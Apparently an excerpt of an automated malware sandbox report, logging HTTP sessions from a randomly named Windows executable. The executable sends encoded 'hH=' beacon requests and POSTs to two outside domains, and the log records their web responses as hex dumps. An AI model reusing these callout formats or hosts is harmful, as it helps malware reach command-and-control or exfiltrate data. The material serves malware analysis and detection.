                40192.168.2.949754208.91.197.27801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:23.640914917 CEST479OUTGET /n12h/?hH=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNlQw99SDhk98goSWR9PKXD7QtbF+D/w==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.thesprinklesontop.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:28.030664921 CEST1236INHTTP/1.1 200 OK
                Date: Wed, 03 Jul 2024 06:56:17 GMT
                Server: Apache
                Set-Cookie: vsid=928vr467535377683394548; expires=Mon, 02-Jul-2029 06:56:17 GMT; Max-Age=157680000; path=/; domain=www.thesprinklesontop.com; HttpOnly
                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BMWiwp+3lgGQSokjUsSRozT3whbhVpeMV/aH8/LDh70uPzYF42dcvbstbn3VN6b8MK8NpgLCKol1f06azTKdGQ==
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Connection: close
                Data Raw: 39 66 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                Data Ascii: 9fe9<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn
                Jul 3, 2024 08:56:28.030941963 CEST224INData Raw: 3d 22 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 72 6f 74 6f 3d 22 68 74 74 70 73 3a 22 7d 69
                Data Ascii: ="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","P
                Jul 3, 2024 08:56:28.030956030 CEST1236INData Raw: 54 22 2c 22 52 4f 22 2c 22 42 47 22 2c 22 45 54 22 2c 22 45 4c 22 2c 22 47 41 22 2c 22 48 52 22 2c 22 4c 56 22 2c 22 4c 54 22 2c 22 4d 54 22 2c 22 4e 4c 22 2c 22 50 4c 22 2c 22 53 56 22 2c 22 53 4b 22 2c 22 53 4c 22 2c 22 43 53 22 2c 22 48 55 22
                Data Ascii: T","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR","ZH","TR","UK","AR","BS"];if("cmp_customlanguages" in window){for(var a=0;a<window.cmp_customlanguages.length;a++){b.push(window.cmp_customlanguages[a
                Jul 3, 2024 08:56:28.031529903 CEST188INData Raw: 67 65 29 7d 69 66 28 22 75 73 65 72 4c 61 6e 67 75 61 67 65 22 20 69 6e 20 6e 61 76 69 67 61 74 6f 72 29 7b 63 2e 70 75 73 68 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 4c 61 6e 67 75 61 67 65 29 7d 76 61 72 20 68 3d 22 22 3b 66 6f 72 28 76 61
                Data Ascii: ge)}if("userLanguage" in navigator){c.push(navigator.userLanguage)}var h="";for(var d=0;d<c.length;d++){var b=c[d].toUpperCase();if(g.indexOf(b)!=-1){h=b;break}if(b.indexOf("-")!=-1){b=b.s
                Jul 3, 2024 08:56:28.031577110 CEST1236INData Raw: 75 62 73 74 72 28 30 2c 32 29 7d 69 66 28 67 2e 69 6e 64 65 78 4f 66 28 62 29 21 3d 2d 31 29 7b 68 3d 62 3b 62 72 65 61 6b 7d 7d 69 66 28 68 3d 3d 22 22 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 64 65 66 61 75 6c 74 6c 61 6e
                Data Ascii: ubstr(0,2)}if(g.indexOf(b)!=-1){h=b;break}}if(h==""&&typeof(cmp_getlang.defaultlang)=="string"&&cmp_getlang.defaultlang!==""){return cmp_getlang.defaultlang}else{if(h==""){h="EN"}}h=h.toUpperCase();return h};(function(){var u=document;var v=u.
                Jul 3, 2024 08:56:28.031723976 CEST224INData Raw: 63 3d 6b 2b 22 2f 2f 22 2b 68 2e 63 6d 70 5f 68 6f 73 74 2b 22 2f 64 65 6c 69 76 65 72 79 2f 63 6d 70 2e 70 68 70 3f 22 2b 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 68 26 26 68 2e 63 6d 70 5f 69 64 3e 30 3f 22 69 64 3d 22 2b 68 2e 63 6d 70 5f 69 64
                Data Ascii: c=k+"//"+h.cmp_host+"/delivery/cmp.php?"+("cmp_id" in h&&h.cmp_id>0?"id="+h.cmp_id:"")+("cmp_cdid" in h?"&cdid="+h.cmp_cdid:"")+"&h="+encodeURIComponent(g)+(c!=""?"&cmpdesign="+encodeURIComponent(c):"")+(f!=""?"&cmpregulatio
                Jul 3, 2024 08:56:28.036952019 CEST1236INData Raw: 6e 6b 65 79 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 66 29 3a 22 22 29 2b 28 72 21 3d 22 22 3f 22 26 63 6d 70 67 70 70 6b 65 79 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 29 3a 22 22 29 2b 28 6e
                Data Ascii: nkey="+encodeURIComponent(f):"")+(r!=""?"&cmpgppkey="+encodeURIComponent(r):"")+(n!=""?"&cmpatt="+encodeURIComponent(n):"")+("cmp_params" in h?"&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).g
                Jul 3, 2024 08:56:28.037247896 CEST224INData Raw: 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 63 72 69 70 74 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68
                Data Ascii: .length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="
                Jul 3, 2024 08:56:28.037260056 CEST1236INData Raw: 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3b 69 66 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75 6c
                Data Ascii: display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","non
                Jul 3, 2024 08:56:28.037928104 CEST1236INData Raw: 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73 65 7b
                Data Ascii: .a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","
                Jul 3, 2024 08:56:28.037942886 CEST448INData Raw: 65 2e 61 70 70 6c 79 28 61 29 29 7d 7d 7d 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 64 2e 64 61 74 61 3d 3d 3d 22 73 74 72 69 6e 67 22
                Data Ascii: e.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.parame


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                41192.168.2.94975566.235.200.146801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:33.481767893 CEST737OUTPOST /0rsk/ HTTP/1.1
                Host: www.stefanogaus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.stefanogaus.com
                Referer: http://www.stefanogaus.com/0rsk/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 59 71 72 65 39 36 52 71 32 47 72 57 44 53 73 30 53 5a 64 73 47 54 54 71 64 4f 55 43 47 56 4d 65 55 68 57 71 64 63 4c 62 33 6f 34 76 38 58 74 6b 4a 53 70 7a 4e 4d 4f 6d 32 56 71 38 41 35 76 71 4a 47 66 41 64 63 52 57 59 6b 67 4c 71 47 78 4d 4b 48 59 41 36 48 36 44 4a 2b 39 68 71 74 6c 68 6e 66 53 63 6d 6b 7a 66 4f 64 5a 78 78 59 64 61 6b 33 55 54 59 31 53 36 6e 41 43 4e 70 41 71 39 4c 36 38 72 4a 52 56 33 6e 6d 62 5a 72 51 59 49 6f 53 51 4c 47 78 35 65 30 53 35 59 43 54 61 45 45 47 2b 67 2b 6a 63 6d 49 55 39 53 35 79 42 57 42 79 49 65 49 77 2f 57 55 66 7a 44
                Data Ascii: hH=Yqre96Rq2GrWDSs0SZdsGTTqdOUCGVMeUhWqdcLb3o4v8XtkJSpzNMOm2Vq8A5vqJGfAdcRWYkgLqGxMKHYA6H6DJ+9hqtlhnfScmkzfOdZxxYdak3UTY1S6nACNpAq9L68rJRV3nmbZrQYIoSQLGx5e0S5YCTaEEG+g+jcmIU9S5yBWByIeIw/WUfzD
                Jul 3, 2024 08:56:34.201245070 CEST1236INHTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:56:34 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Vary: Accept-Encoding
                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                CF-Cache-Status: DYNAMIC
                Set-Cookie: _cfuvid=wq93zh6QjYHzH9DTIIA6l77pbfuhMjdj_Wia_iHEJB0-1719989794146-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnly
                Server: cloudflare
                CF-RAY: 89d4f9f3bacf1871-EWR
                Content-Encoding: gzip
                Data Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e [TRUNCATED]
                Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFY*Y!e$C;<ipH25\G*:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j|`>uwGZ;aE!i<uz?e2JMSvsX?3|BO.c0)<=?hX[aV
                Jul 3, 2024 08:56:34.201256037 CEST591INData Raw: d5 f5 7a f4 4a e7 56 98 89 4b a1 35 ac 96 e7 0e 50 b8 14 de 3b b4 cc a1 c6 ca cf b3 ee d1 7a 55 09 3d 35 d3 2a 29 75 3a 1b a7 c9 5c 27 aa 91 9e 70 41 22 bb ce 0b df 3b d6 a2 73 a2 c6 44 f4 69 b6 31 f9 fb 82 8f 82 11 a4 63 b1 58 14 5a 99 1b b0 a8
                Data Ascii: zJVK5P;zU=5*)u:\'pA";sDi1cXZ7hv<;8^rdeg9p5FMd,+.<I+I%7YEV(mI,RD:u}RY4LY/Y:+yrTn0b6Gs


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                42192.168.2.94975666.235.200.146801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:36.014218092 CEST761OUTPOST /0rsk/ HTTP/1.1
                Host: www.stefanogaus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.stefanogaus.com
                Referer: http://www.stefanogaus.com/0rsk/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 59 71 72 65 39 36 52 71 32 47 72 57 44 78 30 30 42 71 46 73 4e 54 54 70 57 75 55 43 4a 31 4e 56 55 68 4b 71 64 64 65 41 32 64 6f 76 2f 79 52 6b 49 54 70 7a 49 4d 4f 6d 2b 31 72 34 65 4a 76 66 4a 47 61 31 64 65 46 57 59 6e 63 4c 71 44 56 4d 4b 30 77 44 37 58 36 42 44 75 39 6a 33 64 6c 68 6e 66 53 63 6d 6b 6e 31 4f 5a 4e 78 77 6f 4e 61 6b 57 55 53 56 56 53 35 69 77 43 4e 6a 67 71 35 4c 36 38 64 4a 56 30 59 6e 6a 58 5a 72 53 41 49 6f 41 34 49 50 78 35 59 37 79 34 4b 50 57 6e 2b 43 58 2b 2b 34 42 67 78 56 45 59 30 36 54 68 49 51 41 42 46 64 6e 2f 78 54 34 36 72 41 78 30 66 47 2f 45 6d 76 4f 30 76 4c 4f 37 78 6f 79 6d 79 48 77 3d 3d
                Data Ascii: hH=Yqre96Rq2GrWDx00BqFsNTTpWuUCJ1NVUhKqddeA2dov/yRkITpzIMOm+1r4eJvfJGa1deFWYncLqDVMK0wD7X6BDu9j3dlhnfScmkn1OZNxwoNakWUSVVS5iwCNjgq5L68dJV0YnjXZrSAIoA4IPx5Y7y4KPWn+CX++4BgxVEY06ThIQABFdn/xT46rAx0fG/EmvO0vLO7xoymyHw==
                Jul 3, 2024 08:56:36.741837025 CEST1236INHTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:56:36 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Vary: Accept-Encoding
                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                CF-Cache-Status: DYNAMIC
                Set-Cookie: _cfuvid=9nefUG9JgfK8Jvaa6cx.jYVHOqwB4jkc9O3wfoY8OYQ-1719989796691-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnly
                Server: cloudflare
                CF-RAY: 89d4fa03a8a01871-EWR
                Content-Encoding: gzip
                Data Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e [TRUNCATED]
                Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFY*Y!e$C;<ipH25\G*:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j|`>uwGZ;aE!i<uz?e2JMSvsX?3|BO.c0)<=?hX[aV
                Jul 3, 2024 08:56:36.743233919 CEST591INData Raw: d5 f5 7a f4 4a e7 56 98 89 4b a1 35 ac 96 e7 0e 50 b8 14 de 3b b4 cc a1 c6 ca cf b3 ee d1 7a 55 09 3d 35 d3 2a 29 75 3a 1b a7 c9 5c 27 aa 91 9e 70 41 22 bb ce 0b df 3b d6 a2 73 a2 c6 44 f4 69 b6 31 f9 fb 82 8f 82 11 a4 63 b1 58 14 5a 99 1b b0 a8
                Data Ascii: zJVK5P;zU=5*)u:\'pA";sDi1cXZ7hv<;8^rdeg9p5FMd,+.<I+I%7YEV(mI,RD:u}RY4LY/Y:+yrTn0b6Gs


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                43192.168.2.94975766.235.200.146801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:38.826242924 CEST1774OUTPOST /0rsk/ HTTP/1.1
                Host: www.stefanogaus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.stefanogaus.com
                Referer: http://www.stefanogaus.com/0rsk/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 59 71 72 65 39 36 52 71 32 47 72 57 44 78 30 30 42 71 46 73 4e 54 54 70 57 75 55 43 4a 31 4e 56 55 68 4b 71 64 64 65 41 32 65 49 76 38 45 6c 6b 4a 30 39 7a 4c 4d 4f 6d 30 56 72 31 65 4a 76 43 4a 43 32 78 64 65 4a 67 59 68 59 4c 73 51 74 4d 49 46 77 44 79 58 36 42 4c 4f 39 2b 71 74 6c 30 6e 66 43 51 6d 6b 33 31 4f 5a 4e 78 77 75 70 61 69 48 55 53 54 56 53 36 6e 41 43 5a 70 41 71 42 4c 36 6b 4e 4a 55 30 79 6b 58 72 5a 6f 79 51 49 6e 56 6b 49 41 78 35 61 34 79 35 50 50 57 6a 62 43 58 69 55 34 42 34 66 56 47 34 30 72 44 6b 63 4b 68 42 70 45 6e 72 79 52 34 4c 4d 45 58 77 58 63 39 42 42 34 4c 51 56 49 4e 6d 45 68 42 37 38 54 41 56 5a 66 63 47 5a 79 63 52 42 52 30 6f 32 77 4b 42 71 42 77 68 4d 44 75 77 78 4b 57 46 30 72 66 73 31 46 38 61 37 55 64 74 4b 75 37 4c 6f 4f 4d 74 2f 79 4e 4c 50 62 45 55 47 33 4e 55 70 67 34 55 38 4e 76 6c 6a 30 57 51 6a 50 6f 56 55 58 7a 32 43 64 4a 2b 35 2f 6e 71 51 71 67 55 43 30 47 54 44 64 78 6e 33 6f 75 5a 69 45 4a 31 67 33 78 50 32 59 44 45 46 6b 2b 4a 74 50 59 4d [TRUNCATED]
                Data Ascii: hH=Yqre96Rq2GrWDx00BqFsNTTpWuUCJ1NVUhKqddeA2eIv8ElkJ09zLMOm0Vr1eJvCJC2xdeJgYhYLsQtMIFwDyX6BLO9+qtl0nfCQmk31OZNxwupaiHUSTVS6nACZpAqBL6kNJU0ykXrZoyQInVkIAx5a4y5PPWjbCXiU4B4fVG40rDkcKhBpEnryR4LMEXwXc9BB4LQVINmEhB78TAVZfcGZycRBR0o2wKBqBwhMDuwxKWF0rfs1F8a7UdtKu7LoOMt/yNLPbEUG3NUpg4U8Nvlj0WQjPoVUXz2CdJ+5/nqQqgUC0GTDdxn3ouZiEJ1g3xP2YDEFk+JtPYM+XFW+Tk0F9ZZKPruFBBy+pxGhLmjGRYXKOq16Yjk8FvbLDNgnX8ATac4S6fn20L90g9c01t9BeEwsb6wu5tJcxpoIwIGNjo/P99KUOSdckpr1qWv8GnBbHBm3/RRGSvr8yFu7pwjQ9jgqfdNP12jNUOMiKlbTPg0KZvfGGemfa+Cm8ccb9DQmFugQX2v/xoh+KZe0MlUjP5cV84Din8enIpJgxuJT18upUyMZ/I5kcPLFlTRF5/DFsf477BDdu0UMPMy+0dRTtEM8XcsZCGOZU1oIYvGrV9W4k722Z43QEvb2tta7hD+UN+vqgPlT28m/PNBFjAUXPS5A8Fulxaq3zXY02WAs9Mvmgrg8BP2ZaA9eRbBNyvc9GdtCMbKWiFalR1S70AeRPvAwm5xJq10AprrSsLjr15h9wZYojyg2+5ROwhEhQ92DI8D1NEpERVdHxJ3MEXIBAVO8mpPFIJn/H7xeqreEZs/7ehEpCBpEcrRqyyTUodDPOLSbQTgCqitBpxAT6qW9IzZcuptIjywvv5hkj0sEGec2hl6NwfrVb+WOJ7eOlEcR6fpH6r+Weogc9QjhE6gSq820bv/As0a9KRhuQueLf/bA/0Wwmilxt8VjQ3gm/pKSPtFismdBEVKD2LWkiCsFyXCcKBFSitt5xrPYT/2hXnP4B [TRUNCATED]
                Jul 3, 2024 08:56:39.743156910 CEST1236INHTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:56:39 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Vary: Accept-Encoding
                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                CF-Cache-Status: DYNAMIC
                Set-Cookie: _cfuvid=Cw9MB1XKSws5DhwZsI061vsdZkGfcndq5IStvW62SM0-1719989799693-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnly
                Server: cloudflare
                CF-RAY: 89d4fa1538f0c431-EWR
                Content-Encoding: gzip
                Data Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 